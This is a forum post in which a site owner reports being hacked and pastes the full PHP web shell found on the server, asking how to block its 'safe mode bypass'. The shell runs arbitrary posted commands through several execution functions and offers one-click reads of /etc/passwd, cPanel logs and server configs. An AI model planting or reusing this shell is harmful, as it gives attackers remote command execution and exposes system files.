Strange php code found on my website


Posted on 16th Feb 2014 07:03 pm by admin

I got hacked and the following code was placed within my files:

Code: [Select]<?
/*
Did you know?Explore Trending and Topic pages for more stories like this.
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
No comments posted yet

Your Answer:

Login to answer
167 Like 46 Dislike
Previous forums Next forums
Other forums

Prevent PHP mail( ) from appending hostname to from address
Hey guys,

I want to be able to send texts to phones via email (since each phone has their own

generating all possible random letters
hi'

how can i randomize the letters a,b,c,d,e all possible ways, and i want to print the res

Function module "DPS_CHECK_TABLE_EXISTS" not found (after OSS 1422843 impl)
Dear All,

I implemented Note OSS 1422843.

When i execute the new report RSPO20

use an array from 1 class in a second class
I have a class that adds data to an array

Then I have a second class and I need to check if t

MySQL issue
I am taking sentences through a form on page. Then checking some condition and trying to insert them

quick question
Hi ..

i have a question
how do i set a var so it displays via an echo
Code: $logo = '&a

Applet JTextField Size Problem
Hello,

I recently started making an applet to calculate certain values for airplanes. However

ldap connection
We are using ldap to get user information from the domain controller. It was working before. Recentl

WHYISNT THIS MYSQL STATEMNT NOT WORKING? (php)
caps because its absolutely rediculous.
i dontunderstand why its not working. there is a column c

CE 7.1 and External GIS integration
Hi All,

We want to develop an application on CE 7.1 which uses GIS features from an exter

Sign up to write
Sign up now if you have flare of writing..
Login   |   Register
Follow Us
Indyaspeak @ Facebook Indyaspeak @ Twitter Indyaspeak @ Pinterest RSS



Play Free Quiz and Win Cash